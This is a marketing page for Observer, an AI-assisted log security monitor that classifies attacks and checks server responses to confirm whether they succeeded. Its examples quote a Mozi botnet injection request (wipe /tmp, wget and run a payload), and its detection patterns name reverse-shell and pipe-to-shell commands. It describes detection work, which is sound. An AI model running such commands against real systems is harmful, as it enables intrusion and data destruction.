Detects attacks.
Verifies outcomes.
Observer watches container logs and host system events — sshd, sudo, kernel — classifies threats with an LLM, captures HTTP response evidence, and tells you whether the attack actually worked. One accurate finding instead of fifty false alarms.
Two real attacks. Two opposite outcomes.
Most security tools scream on every probe. Observer reads the server's response and decides whether anything actually happened. Here are two real attacks caught in production — one that failed, one that succeeded.
CVE-2025-55182 — React2Shell
We deployed a vulnerable Next.js 15.0.0 container and fired the public PoC for CVE-2025-55182 — a pre-auth RCE in React Server Components that achieves arbitrary code execution as root via a single POST request.
/etc/passwd to container stderr.root:x:0:0:root in the log stream.$ sudo journalctl -u observer -f [ALERT] EventID=evt_0ac2eec76b8b36f2 Source=docker:srv-captain--react2shell-test Reason=System credential file contents (/etc/passwd) in output MatchedVia=seeded [ESCALATE] EventID=evt_0ac2eec76b8b36f2 Source=docker:srv-captain--react2shell-test Reason=System credential file contents (/etc/passwd) in output MatchedVia=seeded (non-HTTP malicious, direct dispatch) → Email sent in 847msNetgear Exploit — Mozi Botnet
An IoT botnet tried to exploit a Netgear router vulnerability to wipe /tmp, download a Mozi binary, and execute it. Tier 1 said “malicious, 0.78” — but the coordinator held for evidence before firing an email.
GET /setup.cgi?cmd=rm+-rf+/tmp/*; wget+malware;sh+netgear [TIER1] verdict=malicious conf=0.78 reason=command execution via setup.cgi [COORDINATOR] holding 3s for REC evidence[REC] response captured: status=404 body=14B [DOWNGRADE] server returned 404 verdict=malicious → recon_failed email suppressed, logged to SQLite → No email. Real attack. Real failure.Multiply the Netgear example by the thousands of probes every public server receives daily. That's the noise floor Observer is built to cut through.
Your logs are screaming. Nobody's listening.
Every container generates logs. Every sshd on every public IP sees thousands of brute force attempts a day. Buried in that noise are the real attacks — command injections that worked, credentials that leaked, unauthorized logins from IPs nobody recognizes. Traditional tools can't tell a health check from a probing attack, and even when they flag something real, they can't tell you whether the attack actually succeeded.
Five layers. Deterministic first, AI second.
Every log line flows through a multi-stage pipeline. Deterministic rules resolve what they can — cheaply, instantly, auditably. The LLM only handles what the rules can't. Evidence decides whether anything gets an email.
Collect
Observer attaches to Docker container stdout/stderr via the socket API, and to the host via journald — sshd, sudo, kernel, systemd units. Every line becomes a structured event. No agents, no sidecars, no daemons on your containers.
Policy Engine
Deterministic rules for host identity events. SSH login from an unknown IP, new user creation, privilege grants, authorized_keys modifications, failed sudo — these never go to the LLM. Policy is identity, not inference. Trusted IP allowlist (exact + CIDR) bypasses alerts for your known networks.
Seed Patterns
Curated content signatures that always mean exploitation. Private keys in output, /etc/passwd contents, reverse shells, curl | sh chains. If any of these appear in any log stream on any server, the attacker has already won. Instant escalation, no LLM, no ambiguity.
Pattern Store
Four-tier cache: exact hash → prefix → regex → substring. Known-good is allowed silently. Known-noise is suppressed. Known-bad fires. 97%+ hit rate in production means the LLM rarely needs to wake up.
LLM Classification
Cache misses go to the LLM with intent-and-outcome framing. It distinguishes recon (404 on a probe) from intrusion (200 on a sensitive path). Failed probes logged, not emailed. Every verdict becomes a reusable pattern — the cache never stops learning.
Capture Evidence
The Response Evidence Capture (REC) pipeline sniffs HTTP responses inside container network namespaces via AF_PACKET. Before any alert fires, Observer asks: what did the server actually return? Body hash, status code, content type.
Verify Outcomes
The forensic coordinator holds ambiguous alerts until evidence arrives. Default page? Login redirect? Error template? Alert downgraded. Real sensitive data leak? Alert escalates. Evidence changes conclusions — the same request can mean different things depending on what came back.
Alert or Silence
Confirmed threats email immediately with full evidence trail. Failed probes persist to SQLite for trend analysis. Catch-all pages verified once and suppressed forever. You only hear about real problems.
Host events. Known exploits. Novel attacks.
Three classes of detection, each tuned for the kind of signal it's watching. Deterministic where the answer is obvious, LLM where it isn't.
SSH Login Monitoring
Unknown-IP SSH logins fire an email in under a second. Trusted IPs (exact or CIDR) bypass silently. Policy is identity, not inference.
User & Privilege Changes
useradd, usermod -aG sudo, passwd changes. An attacker's first move after gaining a shell is usually persistence. Observer catches it before they get comfortable.
SSH Key Tampering
Any write to ~/.ssh/authorized_keys is an escalation event. Adding a key is how attackers maintain access after the initial exploit is patched.
Credential Dumps
root:x:0:0:root in any log stream means exploitation succeeded. The path /etc/passwd in a URL is recon — the contents in output is confirmed compromise.
Private Keys
BEGIN RSA/OPENSSH/EC/PRIVATE KEY appearing in output means key material is being exfiltrated. No benign application prints private keys to stderr.
Reverse Shells & RCE
bash -i >& /dev/tcp, curl | sh, wget | sh, base64 -d | bash, rm -rf /. Presence in any log stream is always active exploitation.
Injection Attacks
SQL injection, shell injection, command chaining, PHP wrappers, encoded payloads, path traversal. Evidence capture verifies whether the database or shell actually responded.
Vulnerability Scanners
Nuclei, CensysInspect, ZMap. ProxyShell/ProxyNotShell probes. Observer knows scanner noise from real exploitation by reading the server's response.
Novel & Zero-Day Patterns
AI-generated payloads, encoded evasions, brand-new CVE exploits. Classified on first contact, cached forever. The longer Observer runs, the less it costs.
One command. Any Linux server.
Observer is a single static Go binary with no runtime dependencies. Docker containers are monitored automatically if Docker is present. If not, Observer watches everything through journald — the policy engine, LLM classification, and email alerts all work on bare metal.
# Install Observer
curl -fsSL https://raw.githubusercontent.com/VaultGuardian/observer/main/install.sh | sudo bashThe installer prompts for your OpenAI API key and alert email, installs the systemd service, and starts Observer. You'll need a GitHub account with private-beta access during the beta period.
Same binary. Same install. Any footprint.
The vaultguardian CLI
vaultguardian status # service + recent logs
vaultguardian logs # tail journalctl -f
vaultguardian stats # pipeline performance
vaultguardian update # latest release
vaultguardian restart # restart service
vaultguardian version # current + available
vaultguardian uninstall # remove observerSingle binary. Zero dependencies. Pure Go.
Observer ships as a single static Go binary with zero CGO dependencies. No agents on your containers. No cloud requirement. Point it at your Docker socket and journald, and it starts learning immediately.
Use Ollama for fully air-gapped deployments, or connect to OpenAI for maximum accuracy. Observer works with any OpenAI-compatible inference endpoint — your logs, your LLM, your choice.
Their AI generates. Your AI learns.
Attackers use AI to generate novel payloads and evasion techniques. Every new variant costs them compute. Observer's AI only pays once per technique — after the first classification, every repeat is a free cache hit. The longer Observer runs, the wider the economic gap.
Built in the open.
Observer v1.0 is released and running on production infrastructure. The core engine is AGPL-3.0 and available on GitHub. The hosted dashboard at vaultguardian.io is free during launch.
Single Go binary. Full TCP reassembly. Human correction workflow. Running on production servers across Contabo and AWS.
Roadmap
Normalizer registry, 4-tier pattern store, LLM classification with caching, deterministic noise suppression.
Deterministic host-event classification. SSH logins, user creation, privilege grants, authorized_keys modifications. Trusted IP allowlist with CIDR.
Curated content signatures for credential dumps, private keys, reverse shells, RCE chains. Matches fire without LLM.
AF_PACKET sniffer in container namespaces, speculative HTTP parsing, structural redaction, evidence-aware re-classification.
Cross-container alert dedup, graveyard for late siblings, evidence sprint timer, transport-only and body-aware downgrades.
Self-learning fingerprinting. Body hash (not size) defeats accordion-attack evasion. Persists to SQLite.
Host-level log collection beyond Docker. SSH auth logs, systemd services, spoof-proof _SYSTEMD_UNIT filtering.
VIP lane for malicious evidence, async SQLite writes, evidence reconciler with terminal states. Survives DDoS and log storms.
WAL mode, versioned migrations, verdict-specific retention. Full HTTP metadata on every finding.
REST API ships with binary. Hosted dashboard at vaultguardian.io with auth, instance management, live event stream, human correction workflow.
Three correction types: noise suppression, failed-probe fingerprinting, validation. Security-safe request/response separation. Backend builds everything server-side.
Licensed AGPL-3.0. Core engine released on GitHub. Hosted dashboard remains the commercial product.
Optional fail2ban / iptables integration. Observer observes by default — response actions are opt-in.
Deterministic evidence matching at the kernel level. Bypasses nginx log limitations. Per-request/response pair binding with no heuristics.
Pod log collection, service mesh awareness, CRD-based configuration.
Recent milestones
React2Shell validation. Added data exfiltration content seeds (passwd/key signatures). Fixed non-HTTP malicious dispatch bug (latent 37 versions). CVE-2025-55182 caught end-to-end.
V1.0 hardening sprint. VIP lane protects malicious evidence from eviction. Body hash defeats accordion-attack. Async SQLite writes survive log storms. 15-min evidence reconciler.
Terminology rename: deny → malicious across 12 Go files + dashboard. Observer observes, never blocks.
Policy Engine. Deterministic pre-LLM layer for SSH/useradd/authorized_keys. Trusted IP allowlist with CIDR. Host identity is not inference.
Journald watcher. Host-level log collection. Spoof-proof _SYSTEMD_UNIT filtering (SYSLOG_IDENTIFIER can be forged).
Verified catch-all suppression. Structural inference + one-time active verification. SQLite persistence.
Evidence pipeline hardened. Weekend soak: 52K events, 0 crashes, 97% cache hit rate.
Namespace capture breakthrough. Structural redaction. Forensic coordinator.
First production deployment. First real threats caught.
Two products. One mission.
The DEC-1 stops data from leaving. Observer catches the intrusion that triggered the exfiltration. Together, nothing gets in or out undetected.
VaultDEC-1
Deterministic Egress Controller. Inline Layer 2 bridge that detects and severs data exfiltration in milliseconds.
Observer
AI-powered log security. Detects attacks, captures evidence, verifies outcomes. Single Go binary, AGPL-3.0 open core.
Start protecting your servers.
Observer v1.0 is open source under AGPL-3.0. Install the binary, bring your own LLM key, and connect to the hosted dashboard for free. No credit card required.